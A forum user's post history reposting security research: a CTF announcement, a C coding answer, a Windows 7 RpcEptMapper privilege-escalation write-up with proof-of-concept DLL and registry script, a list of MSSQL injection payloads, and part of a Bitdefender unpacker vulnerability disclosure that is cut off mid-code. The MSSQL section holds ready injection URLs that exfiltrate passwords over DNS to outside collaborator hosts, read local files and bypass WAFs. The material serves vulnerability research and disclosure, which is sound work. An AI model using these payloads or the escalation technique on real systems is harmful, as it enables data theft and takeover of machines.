Everything posted by Nytro

  1. 20 November 2020, 10:00 - 18:00 Contest prizes: 1st place - 3000 RON 2nd place - 2000 RON 3rd place - 1000 RON Best write-up - 500 RON The prizes are funded by donations from community members: Nytro, malsploit, Dragos, dancezar, Matasareanu. We are going through a difficult period, and our suggestion is that the prizes be donated onward, if that is possible. For discussions about the CTF we will use the #ctf channel on Slack. The contest results will be presented at 18:00. Full details: https://ctf.rstcon.com/
  2. So from "abcde" you want to get "adcbe"? Can you use strlen? If not, you can implement it with a while loop: char sir[] = "abcde"; unsigned int length = 0; while (sir[length]) { length++; } // Done quickly, so double-check it Then swap the second character with the next-to-last one, that is: char x = sir[1]; // Temporarily save the second character sir[1] = sir[length - 2]; // Replace the second character with the next-to-last one sir[length - 2] = x; // Then put the saved character into the next-to-last position I don't know if this is exactly what you need. You probably also need an "if" to check that the string has more than 2 characters.
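A complete, minimal C sketch of the same idea (my own illustration, not part of the original answer, assuming the goal is simply to swap the second character with the next-to-last one, e.g. "abcde" -> "adcbe"):

#include <stdio.h>

int main(void) {
    char sir[] = "abcde";

    /* Compute the length without strlen() */
    unsigned int length = 0;
    while (sir[length] != '\0') {
        length++;
    }

    /* Only swap if the string is long enough for the operation to make sense */
    if (length > 2) {
        char tmp = sir[1];            /* second character */
        sir[1] = sir[length - 2];     /* next-to-last character */
        sir[length - 2] = tmp;
    }

    printf("%s\n", sir); /* prints "adcbe" */
    return 0;
}

Compiled with any standard C compiler, this prints "adcbe" for the input "abcde".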
  3. Prototype pollution is an old attack, however I feel like it is underrated. 20+ JS libraries were vulnerable to this attack, including jQuery. This is an important attack to learn for any web application pentester. There are a few automated tools able to detect this; however, it does require manual inspection. Facebook: https://www.facebook.com/InfoSecForSt... Vuln JS: https://gist.github.com/DaniAkash/b3d... Affected library: https://www.npmjs.com/package/lodash ... Example Test Code: https://github.com/lukeed/klona/pull/... References: https://portswigger.net/daily-swig/pr... https://codeburst.io/what-is-prototyp... https://medium.com/node-modules/what-... https://help.semmle.com/wiki/display/... https://research.securitum.com/protot... #webapppentest #ethicalhacking #burpsuite #pentest #cybersecurity #cybersecuritytraining
  4. Windows RpcEptMapper Service Insecure Registry Permissions EoP November 12, 2020 If you follow me on Twitter, you probably know that I developed my own Windows privilege escalation enumeration script - PrivescCheck - which is a sort of updated and extended version of the famous PowerUp. If you have ever run this script on Windows 7 or Windows Server 2008 R2, you probably noticed a weird recurring result and perhaps thought that it was a false positive just as I did. Or perhaps you’re reading this and you have no idea what I am talking about. Anyway, the only thing you should know is that this script actually did spot a Windows 0-day privilege escalation vulnerability. Here is the story behind this finding… A Bit of Context… At the beginning of this year, I started working on a privilege escalation enumeration script: PrivescCheck. The idea was to build on the work that had already been accomplished with the famous PowerUp tool and implement a few more checks that I found relevant. With this script, I simply wanted to be able to quickly enumerate potential vulnerabilities caused by system misconfigurations, but it actually yielded some unexpected results. Indeed, it enabled me to find a 0-day vulnerability in Windows 7 / Server 2008 R2! Given a fully patched Windows machine, one of the main security issues that can lead to local privilege escalation is service misconfiguration. If a normal user is able to modify an existing service then he/she can execute arbitrary code in the context of LOCAL/NETWORK SERVICE or even LOCAL SYSTEM. Here are the most common vulnerabilities. There is nothing new so you can skip this part if you are already familiar with these concepts. Service Control Manager (SCM) - Low-privileged users can be granted specific permissions on a service through the SCM. For example, a normal user can start the Windows Update service with the command sc.exe start wuauserv thanks to the SERVICE_START permission. This is a very common scenario. However, if this same user had SERVICE_CHANGE_CONFIG, he/she would be able to alter the behavior of that service and make it run an arbitrary executable. Binary permissions - A typical Windows service usually has a command line associated with it. If you can modify the corresponding executable (or if you have write permissions in the parent folder) then you can basically execute whatever you want in the security context of that service. Unquoted paths - This issue is related to the way Windows parses command lines. Let’s consider a fictitious service with the following command line: C:\Applications\Custom Service\service.exe /v. This command line is ambiguous so Windows would first try to execute C:\Applications\Custom.exe with Service\service.exe as the first argument (and /v as the second argument). If a normal user had write permissions in C:\Applications then he/she could hijack the service by copying a malicious executable to C:\Applications\Custom.exe. That’s why paths should always be surrounded by quotes, especially when they contain spaces: "C:\Applications\Custom Service\service.exe" /v Phantom DLL hijacking (and writable %PATH% folders) - Even on a default installation of Windows, some built-in services try to load DLLs that don’t exist. That’s not a vulnerability per se but if one of the folders that are listed in the %PATH% environment variable is writable by a normal user then these services can be hijacked.
Each one of these potential security issues already had a corresponding check in PowerUp but there is another case where misconfiguration may arise: the registry. Usually, when you create a service, you do so by invoking the Service Control Manager using the built-in command sc.exe as an administrator. This will create a subkey with the name of your service in HKLM\SYSTEM\CurrentControlSet\Services and all the settings (command line, user, etc.) will be saved in this subkey. So, if these settings are managed by the SCM, they should be secure by default. At least that’s what I thought… Checking Registry Permissions One of the core functions of PowerUp is Get-ModifiablePath. The basic idea behind this function is to provide a generic way to check whether the current user can modify a file or a folder in any way (e.g.: AppendData/AddSubdirectory). It does so by parsing the ACL of the target object and then comparing it to the permissions that are given to the current user account through all the groups it belongs to. Although this principle was originally implemented for files and folders, registry keys are securable objects too. Therefore, it’s possible to implement a similar function to check if the current user has any write permissions on a registry key. That’s exactly what I did and I thus added a new core function: Get-ModifiableRegistryPath. Then, implementing a check for modifiable registry keys corresponding to Windows services is as easy as calling the Get-ChildItem PowerShell command on the path Registry::HKLM\SYSTEM\CurrentControlSet\Services. The result can simply be piped to the new Get-ModifiableRegistryPath command, and that’s all. When I need to implement a new check, I use a Windows 10 machine, and I also use the same machine for the initial testing to see if everything is working as expected. When the code is stable, I extend the tests to a few other Windows VMs to make sure that it’s still PowerShell v2 compatible and that it can still run on older systems. The operating systems I use the most for that purpose are Windows 7, Windows 2008 R2 and Windows Server 2012 R2. When I ran the updated script on a default installation of Windows 10, it didn’t return anything, which was the result I expected. But then, I ran it on Windows 7 and I saw this: Since I didn’t expect the script to yield any result, I first thought that these were false positives and that I had messed up at some point in the implementation. But, before getting back to the code, I did take a closer look at these results… A False Positive? According to the output of the script, the current user has some write permissions on two registry keys: HKLM\SYSTEM\CurrentControlSet\Services\Dnscache HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper Let’s manually check the permissions of the RpcEptMapper service using the regedit GUI. One thing I really like about the Advanced Security Settings window is the Effective Permissions tab. You can pick any user or group name and immediately see the effective permissions that are granted to this principal without the need to inspect all the ACEs separately. The following screenshot shows the result for the low privileged lab-user account. Most permissions are standard (e.g.: Query Value) but one in particular stands out: Create Subkey.
The generic name corresponding to this permission is AppendData/AddSubdirectory, which is exactly what was reported by the script: Name : RpcEptMapper ImagePath : C:\Windows\system32\svchost.exe -k RPCSS User : NT AUTHORITY\NetworkService ModifiablePath : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper} IdentityReference : NT AUTHORITY\Authenticated Users Permissions : {ReadControl, AppendData/AddSubdirectory, ReadData/ListDirectory} Status : Running UserCanStart : True UserCanRestart : False Name : RpcEptMapper ImagePath : C:\Windows\system32\svchost.exe -k RPCSS User : NT AUTHORITY\NetworkService ModifiablePath : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper} IdentityReference : BUILTIN\Users Permissions : {WriteExtendedAttributes, AppendData/AddSubdirectory, ReadData/ListDirectory} Status : Running UserCanStart : True UserCanRestart : False What does this mean exactly? It means that we cannot just modify the ImagePath value for example. To do so, we would need the WriteData/AddFile permission. Instead, we can only create a new subkey. Does it mean that it was indeed a false positive? Surely not. Let the fun begin! RTFM At this point, we know that we can create arbitrary subkeys under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper but we cannot modify existing subkeys and values. These already existing subkeys are Parameters and Security, which are quite common for Windows services. Therefore, the first question that came to mind was: is there any other predefined subkey - such as Parameters and Security - that we could leverage to effectively modify the configuration of the service and alter its behavior in any way? To answer this question, my initial plan was to enumerate all existing keys and try to identify a pattern. The idea was to see which subkeys are meaningful for a service’s configuration. I started to think about how I could implement that in PowerShell and then sort the result. Though, before doing so, I wondered if this registry structure was already documented. So, I googled something like windows service configuration registry site:microsoft.com and here is the very first result that came out. Looks promising, doesn’t it? At first glance, the documentation did not seem to be exhaustive and complete. Considering the title, I expected to see some sort of tree structure detailing all the subkeys and values defining a service’s configuration but it was clearly not there. Still, I did take a quick look at each paragraph. And, I quickly spotted the keywords “Performance” and “DLL”. Under the subtitle “Performance”, we can read the following: Performance: A key that specifies information for optional performance monitoring. The values under this key specify the name of the driver’s performance DLL and the names of certain exported functions in that DLL. You can add value entries to this subkey using AddReg entries in the driver’s INF file. According to this short paragraph, one can theoretically register a DLL in a driver service in order to monitor its performance thanks to the Performance subkey. OK, this is really interesting! This key doesn’t exist by default for the RpcEptMapper service so it looks like it is exactly what we need. There is a slight problem though: this service is definitely not a driver service. Anyway, it’s still worth a try, but we need more information about this “Performance Monitoring” feature first.
Note: in Windows, each service has a given Type. A service type can be one of the following values: SERVICE_KERNEL_DRIVER (1), SERVICE_FILE_SYSTEM_DRIVER (2), SERVICE_ADAPTER (4), SERVICE_RECOGNIZER_DRIVER (8), SERVICE_WIN32_OWN_PROCESS (16), SERVICE_WIN32_SHARE_PROCESS (32) or SERVICE_INTERACTIVE_PROCESS (256). After some googling, I found this resource in the documentation: Creating the Application’s Performance Key. First, there is a nice tree structure that lists all the keys and values we have to create. Then, the description gives the following key information: The Library value can contain a DLL name or a full path to a DLL. The Open, Collect, and Close values allow you to specify the names of the functions that should be exported by the DLL. The data type of these values is REG_SZ (or even REG_EXPAND_SZ for the Library value). If you follow the links that are included in this resource, you’ll even find the prototype of these functions along with some code samples: Implementing OpenPerformanceData. DWORD APIENTRY OpenPerfData(LPWSTR pContext); DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); DWORD APIENTRY ClosePerfData(); I think that’s enough with the theory, it’s time to start writing some code! Writing a Proof-of-Concept Thanks to all the bits and pieces I was able to collect throughout the documentation, writing a simple Proof-of-Concept DLL should be pretty straightforward. But still, we need a plan! When I need to exploit some sort of DLL hijacking vulnerability, I usually start with a simple and custom log helper function. The purpose of this function is to write some key information to a file whenever it’s invoked. Typically, I log the PID of the current process and the parent process, the name of the user that runs the process and the corresponding command line. I also log the name of the function that triggered this log event. This way, I know which part of the code was executed. In my other articles, I always skipped the development part because I assumed that it was more or less obvious. But, I also want my blog posts to be beginner-friendly, so there is a contradiction. I will remedy this situation here by detailing the process. So, let’s fire up Visual Studio and create a new “C++ Console App” project. Note that I could have created a “Dynamic-Link Library (DLL)” project but I find it actually easier to just start with a console app. Here is the initial code generated by Visual Studio: #include <iostream> int main() { std::cout << "Hello World!\n"; } Of course, that’s not what we want. We want to create a DLL, not an EXE, so we have to replace the main function with DllMain. You can find a skeleton code for this function in the documentation: Initialize a DLL. #include <Windows.h> extern "C" BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved) { switch (reason) { case DLL_PROCESS_ATTACH: Log(L"DllMain"); // See log helper function below break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; } In parallel, we also need to change the settings of the project to specify that the output compiled file should be a DLL rather than an EXE. To do so, you can open the project properties and, in the “General” section, select “Dynamic Library (.dll)” as the “Configuration Type”. Right under the title bar, you can also select “All Configurations” and “All Platforms” so that this setting can be applied globally. 
Next, I add my custom log helper function. #include <Lmcons.h> // UNLEN + GetUserName #include <tlhelp32.h> // CreateToolhelp32Snapshot() #include <strsafe.h> void Log(LPCWSTR pwszCallingFrom) { LPWSTR pwszBuffer, pwszCommandLine; WCHAR wszUsername[UNLEN + 1] = { 0 }; SYSTEMTIME st = { 0 }; HANDLE hToolhelpSnapshot; PROCESSENTRY32 stProcessEntry = { 0 }; DWORD dwPcbBuffer = UNLEN, dwBytesWritten = 0, dwProcessId = 0, dwParentProcessId = 0, dwBufSize = 0; BOOL bResult = FALSE; // Get the command line of the current process pwszCommandLine = GetCommandLine(); // Get the name of the process owner GetUserName(wszUsername, &dwPcbBuffer); // Get the PID of the current process dwProcessId = GetCurrentProcessId(); // Get the PID of the parent process hToolhelpSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); stProcessEntry.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hToolhelpSnapshot, &stProcessEntry)) { do { if (stProcessEntry.th32ProcessID == dwProcessId) { dwParentProcessId = stProcessEntry.th32ParentProcessID; break; } } while (Process32Next(hToolhelpSnapshot, &stProcessEntry)); } CloseHandle(hToolhelpSnapshot); // Get the current date and time GetLocalTime(&st); // Prepare the output string and log the result dwBufSize = 4096 * sizeof(WCHAR); pwszBuffer = (LPWSTR)malloc(dwBufSize); if (pwszBuffer) { StringCchPrintf(pwszBuffer, dwBufSize, L"[%.2u:%.2u:%.2u] - PID=%d - PPID=%d - USER='%s' - CMD='%s' - METHOD='%s'\r\n", st.wHour, st.wMinute, st.wSecond, dwProcessId, dwParentProcessId, wszUsername, pwszCommandLine, pwszCallingFrom ); LogToFile(L"C:\\LOGS\\RpcEptMapperPoc.log", pwszBuffer); free(pwszBuffer); } } Then, we can populate the DLL with the three functions we saw in the documentation. The documentation also states that they should return ERROR_SUCCESS if successful. DWORD APIENTRY OpenPerfData(LPWSTR pContext) { Log(L"OpenPerfData"); return ERROR_SUCCESS; } DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned) { Log(L"CollectPerfData"); return ERROR_SUCCESS; } DWORD APIENTRY ClosePerfData() { Log(L"ClosePerfData"); return ERROR_SUCCESS; } Ok, so the project is now properly configured, DllMain is implemented, we have a log helper function and the three required functions. One last thing is missing though. If we compile this code, OpenPerfData, CollectPerfData and ClosePerfData will be available as internal functions only so we need to export them. This can be achieved in several ways. For example, you could create a DEF file and then configure the project appropriately. However, I prefer to use the __declspec(dllexport) keyword (doc), especially for a small project like this one. This way, we just have to declare the three functions at the beginning of the source code. extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext); extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned); extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData(); If you want to see the full code, I uploaded it here. Finally, we can select Release/x64 and “Build the solution”. This will produce our DLL file: .\DllRpcEndpointMapperPoc\x64\Release\DllRpcEndpointMapperPoc.dll. Testing the PoC Before going any further, I always make sure that my payload is working properly by testing it separately. The little time spent here can save a lot of time afterwards by preventing you from going down a rabbit hole during a hypothetical debug phase. 
To do so, we can simply use rundll32.exe and pass the name of the DLL and the name of an exported function as the parameters. C:\Users\lab-user\Downloads\>rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by rundll32.exe. The second one was written when OpenPerfData was called. Looks good! [21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='DllMain' [21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='OpenPerfData' Ok, now we can focus on the actual vulnerability and start by creating the required registry key and values. We can either do this manually using reg.exe / regedit.exe or programmatically with a script. Since I already went through the manual steps during my initial research, I’ll show a cleaner way to do the same thing with a PowerShell script. Besides, creating registry keys and values in PowerShell is as easy as calling New-Item and New-ItemProperty, isn’t it? Requested registry access is not allowed… Hmmm, ok… It looks like it won’t be that easy after all. I didn’t really investigate this issue but my guess is that when we call New-Item, powershell.exe actually tries to open the parent registry key with some flags that correspond to permissions we don’t have. Anyway, if the built-in cmdlets don’t do the job, we can always go down one level and invoke DotNet functions directly. Indeed, registry keys can also be created with the following code in PowerShell. [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey("SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance") Here we go! In the end, I put together the following script in order to create the appropriate key and values, wait for some user input and finally terminate by cleaning everything up. $ServiceKey = "SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance" Write-Host "[*] Create 'Performance' subkey" [void] [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey($ServiceKey) Write-Host "[*] Create 'Library' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Value "$($pwd)\DllRpcEndpointMapperPoc.dll" -PropertyType "String" -Force | Out-Null Write-Host "[*] Create 'Open' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Value "OpenPerfData" -PropertyType "String" -Force | Out-Null Write-Host "[*] Create 'Collect' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Value "CollectPerfData" -PropertyType "String" -Force | Out-Null Write-Host "[*] Create 'Close' value" New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Value "ClosePerfData" -PropertyType "String" -Force | Out-Null Read-Host -Prompt "Press any key to continue" Write-Host "[*] Cleanup" Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Force Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Force Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Force Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Force [Microsoft.Win32.Registry]::LocalMachine.DeleteSubKey($ServiceKey) The last step now: how do we trick the RPC Endpoint Mapper service into loading our Performance DLL? Unfortunately, I haven’t kept track of all the different things I tried. It would have been really interesting in the context of this blog post to highlight how tedious and time consuming research can sometimes be.
Anyway, one thing I found along the way is that you can query Performance Counters using WMI (Windows Management Instrumentation), which isn’t too surprising after all. More info here: WMI Performance Counter Types. Counter types appear as the CounterType qualifier for properties in Win32_PerfRawData classes, and as the CookingType qualifier for properties in Win32_PerfFormattedData classes. So, I first enumerated the WMI classes that are related to Performance Data in PowerShell using the following command. Get-WmiObject -List | Where-Object { $_.Name -Like "Win32_Perf*" } And, I saw that my log file was created almost right away! Here is the content of the file. [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='DllMain' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='OpenPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' [21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData' I expected to get arbitrary code execution as NETWORK SERVICE in the context of the RpcEptMapper service at most, but it looks like I got a much better result than anticipated. I actually got arbitrary code execution in the context of the WMI service itself, which runs as LOCAL SYSTEM. How amazing is that?! Note: if I had got arbitrary code execution as NETWORK SERVICE, I would have been just a token away from the LOCAL SYSTEM account thanks to the trick that was demonstrated by James Forshaw a few months ago in this blog post: Sharing a Logon Session a Little Too Much. I also tried to get each WMI class separately and I observed the exact same result. Get-WmiObject Win32_Perf Get-WmiObject Win32_PerfRawData Get-WmiObject Win32_PerfFormattedData Conclusion I don’t know how this vulnerability has gone unnoticed for so long. One explanation is that other tools probably looked for full write access in the registry, whereas AppendData/AddSubdirectory was actually enough in this case. Regarding the “misconfiguration” itself, I would assume that the registry key was set this way for a specific purpose, although I can’t think of a concrete scenario in which users would have any kind of permissions to modify a service’s configuration.
I decided to write about this vulnerability publicly for two reasons. The first one is that I actually made it public - without initially realizing it - the day I updated my PrivescCheck script with the Get-ModifiableRegistryPath function, which was several months ago. The second one is that the impact is low. It requires local access and affects only old versions of Windows that are no longer supported (unless you have purchased the Extended Support…). At this point, if you are still using Windows 7 / Server 2008 R2 without isolating these machines properly in the network first, then preventing an attacker from getting SYSTEM privileges is probably the least of your worries. Apart from the anecdotal side of this privilege escalation vulnerability, I think that this “Performance” registry setting opens up really interesting opportunities for post exploitation, lateral movement and AV/EDR evasion. I already have a few particular scenarios in mind but I haven’t tested any of them yet. To be continued?… Links & Resources GitHub - PrivescCheck https://github.com/itm4n/PrivescCheck GitHub - PowerUp https://github.com/HarmJ0y/PowerUp Microsoft - “HKLM\SYSTEM\CurrentControlSet\Services Registry Tree” https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree Microsoft - Creating the Application’s Performance Key https://docs.microsoft.com/en-us/windows/win32/perfctrs/creating-the-applications-performance-key Sursa: https://itm4n.github.io/windows-registry-rpceptmapper-eop/
  5. Advanced MSSQL Injection Tricks Written by PT SWARM Team on November 12, 2020 We compiled a list of several techniques for improved exploitation of MSSQL injections. All the vectors have been tested on at least three of the latest versions of Microsoft SQL Server: 2019, 2017, 2016SP2. DNS Out-of-Band If confronted with a fully blind SQL injection with disabled stacked queries, it’s possible to attain DNS out-of-band (OOB) data exfiltration via the functions fn_xe_file_target_read_file, fn_get_audit_file, and fn_trace_gettable. fn_xe_file_target_read_file() example: https://vuln.app/getItem?id=1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null)) Permissions: Requires VIEW SERVER STATE permission on the server. fn_get_audit_file() example: https://vuln.app/getItem?id=1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default))) Permissions: Requires the CONTROL SERVER permission. fn_trace_gettable() example: https://vuln.app/getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default)) Permissions: Requires the CONTROL SERVER permission. Alternative Error-Based vectors Error-based SQL injections typically resemble constructions such as «+AND+1=@@version--» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data. Some examples of such functions: SUSER_NAME() USER_NAME() PERMISSIONS() DB_NAME() FILE_NAME() TYPE_NAME() COL_NAME() Example use of function USER_NAME(): https://vuln.app/getItem?id=1'%2buser_name(@@version)-- Quick exploitation: Retrieve an entire table in one query There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it. The query to retrieve the schema, tables and columns from the current database: https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto-- Error-based vectors need an alias or a name, since the output of expressions without either cannot be formatted as JSON. https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)-- Reading local files An example of retrieving a local file C:\Windows\win.ini using the function OpenRowset(): https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x)),null,null Error-based vector: https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))-- Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.
Retrieving the current query The current SQL query being executed can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text: https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null Permissions: If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session. Little tricks for WAF bypasses Non-standard whitespace characters: %C2%85 or %C2%A0: https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null-- Scientific (0e) and hex (0x) notation for obfuscating UNION: https://vuln.app/getItem?id=0eunion+select+null,@@version,null-- https://vuln.app/getItem?id=0xunion+select+null,@@version,null-- A period instead of a whitespace between FROM and a column name: https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users-- \N separator between SELECT and a throwaway column: https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users-- Sursa: https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
  6. November 10, 2020 Bitdefender: UPX Unpacking Featuring Ten Memory Corruptions This post breaks the two-year silence of this blog, showcasing a selection of memory corruption vulnerabilities in Bitdefender’s anti-virus engine. Introduction The goal of binary packing is to compress or obfuscate a binary, usually to save space/bandwidth or to evade malware analysis. A packed binary typically contains a compressed/obfuscated data payload. When the binary is executed, a loader decompresses this payload and then jumps to the actual entry point of the (inner) binary. Most anti-virus engines support binary unpacking at least for packers (such as UPX) that are very popular and that are also used by non-malware software. This blog post is about UPX unpacking of PE binaries in the Bitdefender core engine. The main steps in UPX unpacking of PE binary files are the following: Detect the loader from the entry point Find the compressed data payload and extract it Unfilter the extracted code Rebuild various structures (such as the import table, the relocation table, the export table, and the resources) The following vulnerabilities are presented in the control-flow order of the UPX unpacker. Disclaimer: In the following, decompiled code from Bitdefender’s core engine is presented. The naming of variables, fields, and macros is heavily inspired by the original UPX. For some snippets, a reference to the original function is added for comparison. It is likely that some types are incorrect. //1//: Stack Buffer Overflow in Pre-Extraction Deobfuscation After the UPX loader has been detected, the Bitdefender engine tries to detect whether the loader applies a specific kind of deobfuscation to the compressed data payload before extracting it. The (de)obfuscation is very simple, making only use of the three operations ADD, XOR, and ROTATE_LEFT. If this deobfuscation is detected, then the engine iterates through the corresponding instructions of the loader and parses them with their operands in order to be able to deobfuscate the data as well. This looks as follows: int32_t operation[16]; // on the stack int32_t operand[16]; // on the stack int i = 0; int pos = 0; do { bool op_XOR_or_ADD = false; if (loaderdata[pos] == 0x81u && (loaderdata[pos + 1] == 0x34 || loaderdata[pos + 1] == 0x4)) { operation[i] = (loaderdata[pos + 1] == 0x34) ? OP_XOR : OP_ADD; operand[i] = *(int32_t *)&loaderdata[pos + 3]; ++i; pos += 7; op_XOR_or_ADD = true; } } if (loaderdata[pos] == 0xC1u && loaderdata[pos + 1] == 4) { operation[i] = OP_ROTATE_LEFT; operand[i] = loaderdata[pos + 3]; ++i; pos += 4; if (i == 16) break; continue; } if (op_XOR_or_ADD) { if (i == 16) break; continue; } if (loaderdata[pos] == 0xE2u) { /* omitted: apply collected operations */ } pos += 2; } while (pos + SOME_SLACK < loaderdata_end); Observe how the bound-check on the index variable i is performed. As the buffer loaderdata is fully attacker-controlled, it is easy to verify that we can increase the index variable i by two before running into one of the checks i == 16. In particular, we can increase i from 15 to 17, after which we can overwrite the stack with completely arbitrary data. (10ec.12dc): Break instruction exception - code 80000003 (first chance) 00000000`0601fe42 cc int 3 The debug break is due to the stack canary which we have overwritten. If we continue, we see that the return fails because the stack is corrupted. 
0:000> g (10ec.12dc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 00000000`06006603 c3 ret 0:000> dd rsp 00000000`0014ed98 deadbeef deadbeef deadbeef deadbeef 00000000`0014eda8 deadbeef deadbeef deadbeef deadbeef //2//: Heap Buffer Overflow in Pre-Extraction Deobfuscation The collected operations (for the deobfuscation shown in //1//) are applied to the payload buffer at an attacker-controlled offset write_offset. Obviously, this offset needs to be checked before writing to it. There are two checks on write_offset. The first is if (write_offset <= extractobj->dword10 + 3) and the second one is if (loaderdata[pos] == 0xE2u) { if (write_offset >= extractobj->dword10 - 3) Both checks test against the field dword10. The field dword10, sitting on the calling function's stack frame, is never initialized. This makes the bound check useless and introduces a fully attacker-controlled heap buffer overflow. //3//: Heap Buffer Overflow in Post-Extraction Deobfuscation After the extraction, the engine attempts to deobfuscate the extracted data with a static XOR key. for(int i=0; i<0x300; i++) { if (*(int32_t *)&entrypoint_data[i] == 0x4243484B) { int32_t j = i + 0x4A; uint8_t xor_key = entrypoint_data[j]; // attacker-controlled int32_t xor_len = *(int32_t *)&entrypoint_data[j - 7]; // attacker-controlled if (xor_len > packer->set_to_size_of_rawdata) return j; // <-- wrong bound 